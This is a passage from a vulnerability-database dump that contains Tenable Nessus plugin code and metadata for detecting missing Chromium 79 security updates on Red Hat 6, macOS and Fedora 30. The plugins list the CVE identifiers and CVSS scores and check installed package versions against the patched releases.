\"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\");\n script_xref(name:\"RHSA\", value:\"2019:4238\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:4238)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 79.0.3945.79.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use after free in Bluetooth (CVE-2019-13725)\n\n* chromium-browser: Heap buffer overflow in password manager\n(CVE-2019-13726)\n\n* chromium-browser: Insufficient policy enforcement in WebSockets\n(CVE-2019-13727)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2019-13728)\n\n* chromium-browser: Use after free in WebSockets (CVE-2019-13729)\n\n* chromium-browser: Type Confusion in V8 (CVE-2019-13730)\n\n* chromium-browser: Use after free in WebAudio (CVE-2019-13732)\n\n* chromium-browser: Out of bounds write in SQLite (CVE-2019-13734)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2019-13735)\n\n* chromium-browser: Type Confusion in V8 (CVE-2019-13764)\n\n* chromium-browser: Integer overflow in PDFium (CVE-2019-13736)\n\n* chromium-browser: Insufficient policy enforcement in autocomplete\n(CVE-2019-13737)\n\n* chromium-browser: Insufficient policy enforcement in navigation\n(CVE-2019-13738)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13739)\n\n* chromium-browser: Incorrect security UI in sharing (CVE-2019-13740)\n\n* chromium-browser: Insufficient validation of untrusted input in\nBlink (CVE-2019-13741)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13742)\n\n* chromium-browser: Incorrect security UI in external protocol\nhandling (CVE-2019-13743)\n\n* chromium-browser: Insufficient policy enforcement in cookies\n(CVE-2019-13744)\n\n* chromium-browser: Insufficient policy enforcement in audio\n(CVE-2019-13745)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox\n(CVE-2019-13746)\n\n* chromium-browser: Uninitialized Use in rendering (CVE-2019-13747)\n\n* chromium-browser: Insufficient policy enforcement in developer tools\n(CVE-2019-13748)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13749)\n\n* chromium-browser: Insufficient data validation in SQLite\n(CVE-2019-13750)\n\n* chromium-browser: Uninitialized Use in SQLite (CVE-2019-13751)\n\n* chromium-browser: Out of bounds read in SQLite (CVE-2019-13752)\n\n* chromium-browser: Out of bounds read in SQLite (CVE-2019-13753)\n\n* chromium-browser: Insufficient policy enforcement in extensions\n(CVE-2019-13754)\n\n* chromium-browser: Insufficient policy enforcement in extensions\n(CVE-2019-13755)\n\n* chromium-browser: Incorrect security UI in printing (CVE-2019-13756)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13757)\n\n* chromium-browser: Insufficient policy enforcement in navigation\n(CVE-2019-13758)\n\n* chromium-browser: Incorrect security UI in interstitials\n(CVE-2019-13759)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13761)\n\n* chromium-browser: Insufficient policy enforcement in downloads\n(CVE-2019-13762)\n\n* chromium-browser: Insufficient policy enforcement in payments\n(CVE-2019-13763)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:4238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13740\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13745\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13747\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13750\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13757\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13764\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:4238\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-79.0.3945.79-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-79.0.3945.79-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-79.0.3945.79-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-79.0.3945.79-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:05", "description": "The version of Google Chrome installed on the remote macOS host is prior to 79.0.3945.79. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_12_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "nessus", "title": "Google Chrome < 79.0.3945.79 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2020-01-10T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_79_0_3945_79.NASL", "href": "https://www.tenable.com/plugins/nessus/131953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131953);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/10\");\n\n script_cve_id(\n \"CVE-2019-13725\",\n \"CVE-2019-13726\",\n \"CVE-2019-13727\",\n \"CVE-2019-13728\",\n \"CVE-2019-13729\",\n \"CVE-2019-13730\",\n \"CVE-2019-13732\",\n \"CVE-2019-13734\",\n \"CVE-2019-13735\",\n \"CVE-2019-13736\",\n \"CVE-2019-13737\",\n \"CVE-2019-13738\",\n \"CVE-2019-13739\",\n \"CVE-2019-13740\",\n \"CVE-2019-13741\",\n \"CVE-2019-13742\",\n \"CVE-2019-13743\",\n \"CVE-2019-13744\",\n \"CVE-2019-13745\",\n \"CVE-2019-13746\",\n \"CVE-2019-13747\",\n \"CVE-2019-13748\",\n \"CVE-2019-13749\",\n \"CVE-2019-13750\",\n \"CVE-2019-13751\",\n \"CVE-2019-13752\",\n \"CVE-2019-13753\",\n \"CVE-2019-13754\",\n \"CVE-2019-13755\",\n \"CVE-2019-13756\",\n \"CVE-2019-13757\",\n \"CVE-2019-13758\",\n \"CVE-2019-13759\",\n \"CVE-2019-13761\",\n \"CVE-2019-13762\",\n \"CVE-2019-13763\",\n \"CVE-2019-13764\"\n );\n\n script_name(english:\"Google Chrome < 79.0.3945.79 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Google Chrome\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 79.0.3945.79. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2019_12_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5e80c206\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025067\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1027152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/944619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1024758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025489\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1028862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1023817\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1028863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1020899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1017441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/824715\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1005596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1011950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1017564\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/754304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/853670\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/990867\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/999932\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1018528\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/993706\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1010765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025464\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025471\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/442579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/696208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/708595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/884693\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/979441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/901789\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1002687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1004212\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1011600\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1032080\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 79.0.3945.79 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13725\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'79.0.3945.79', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:05:33", "description": "Update to 79.0.3945.117. Fixes CVE-2020-6377.\n\n----\n\nSecurity fix for CVE-2019-13767.\n\n----\n\nUpdate to Chromium 79. Fixes the usual giant pile of bugs and security issues. This time, the list is :\n\nCVE-2019-13725 CVE-2019-13726 CVE-2019-13727 CVE-2019-13728 CVE-2019-13729 CVE-2019-13730 CVE-2019-13732 CVE-2019-13734 CVE-2019-13735 CVE-2019-13764 CVE-2019-13736 CVE-2019-13737 CVE-2019-13738 CVE-2019-13739 CVE-2019-13740 CVE-2019-13741 CVE-2019-13742 CVE-2019-13743 CVE-2019-13744 CVE-2019-13745 CVE-2019-13746 CVE-2019-13747 CVE-2019-13748 CVE-2019-13749 CVE-2019-13750 CVE-2019-13751 CVE-2019-13752 CVE-2019-13753 CVE-2019-13754 CVE-2019-13755 CVE-2019-13756 CVE-2019-13757 CVE-2019-13758 CVE-2019-13759 CVE-2019-13761 CVE-2019-13762 CVE-2019-13763\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-21T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2020-4355ea258e)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764", "CVE-2019-13767", "CVE-2020-6377"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2020-4355EA258E.NASL", "href": "https://www.tenable.com/plugins/nessus/133113", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-4355ea258e.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133113);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\", \"CVE-2019-13767\", \"CVE-2020-6377\");\n script_xref(name:\"FEDORA\", value:\"2020-4355ea258e\");\n\n script_name(english:\"Fedora 30 : chromium (2020-4355ea258e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 79.0.3945.117. Fixes CVE-2020-6377.\n\n----\n\nSecurity fix for CVE-2019-13767.\n\n----\n\nUpdate to Chromium 79. Fixes the usual giant pile of bugs and security\nissues. This time, the list is :\n\nCVE-2019-13725 CVE-2019-13726 CVE-2019-13727 CVE-2019-13728\nCVE-2019-13729 CVE-2019-13730 CVE-2019-13732 CVE-2019-13734\nCVE-2019-13735 CVE-2019-13764 CVE-2019-13736 CVE-2019-13737\nCVE-2019-13738 CVE-2019-13739 CVE-2019-13740 CVE-2019-13741\nCVE-2019-13742 CVE-2019-13743 CVE-2019-13744 CVE-2019-13745\nCVE-2019-13746 CVE-2019-13747 CVE-2019-13748 CVE-2019-13749\nCVE-2019-13750 CVE-2019-13751 CVE-2019-13752 CVE-2019-13753\nCVE-2019-13754 CVE-2019-13755 CVE-2019-13756 CVE-2019-13757\nCVE-2019-13758 CVE-2019-13759 CVE-2019-13761 CVE-2019-13762\nCVE-2019-13763\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-4355ea258e\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 